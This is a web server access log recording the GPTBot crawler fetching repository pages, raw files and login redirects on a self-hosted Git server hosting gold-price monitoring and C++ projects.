"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:17:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 10887] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 12188] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 19338] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/api_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/api_fetcher.py" +[17/Feb/2026:17:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:17:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 12198] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:30:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/krx_gold_fetcher.py" +[17/Feb/2026:17:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 6846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:30:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:30:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:30:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/ReadMe.md" +[17/Feb/2026:17:30:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 868] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 725] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.spec" +[17/Feb/2026:17:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/gold_monitor.log" [Client 74.7.227.38] [Length 930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor.log" +[17/Feb/2026:17:30:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 852] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/notifier.py" +[17/Feb/2026:17:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/pyvenv.cfg" +[17/Feb/2026:17:30:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:17:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11633] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:30:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10299] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:31:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10299] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10050] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" +[17/Feb/2026:17:31:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10290] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10298] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:31:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12992] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" +[17/Feb/2026:17:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:31:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9968] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:17:31:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html?display=rendered" [Client 74.7.227.38] [Length 14676] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:17:31:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" +[17/Feb/2026:17:31:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9956] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:31:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10119] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11345] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:31:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11344] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 